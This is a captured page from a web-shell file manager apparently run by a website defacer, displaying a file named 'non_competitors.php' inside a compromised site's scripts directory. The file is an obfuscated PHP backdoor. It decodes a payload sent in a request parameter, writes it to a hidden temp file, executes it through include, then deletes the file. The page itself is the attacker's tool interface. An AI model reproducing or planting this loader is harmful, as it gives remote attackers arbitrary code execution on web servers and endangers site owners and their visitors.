whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
scripts
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/scripts/non_competitors.php
<?php if(!empty($_REQUEST["en\x74"])){ $mrk = $_REQUEST["en\x74"]; $mrk = explode( "." ,$mrk) ; $key = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s8 ); foreach( $mrk as $n => $v7) { $chS = ord( $s8[$n % $lenS] ); $d =( ( int)$v7 - $chS -( $n % 10)) ^ 68; $key .= chr( $d ); } $symbol = array_filter(["/var/tmp", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/tmp"]); while ($component = array_shift($symbol)) { if (!!is_dir($component) && !!is_writable($component)) { $value = join("/", [$component, ".item"]); $file = fopen($value, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $value; @unlink($value); die(); } } } }
Copyright ©2021 || Defacer Indonesia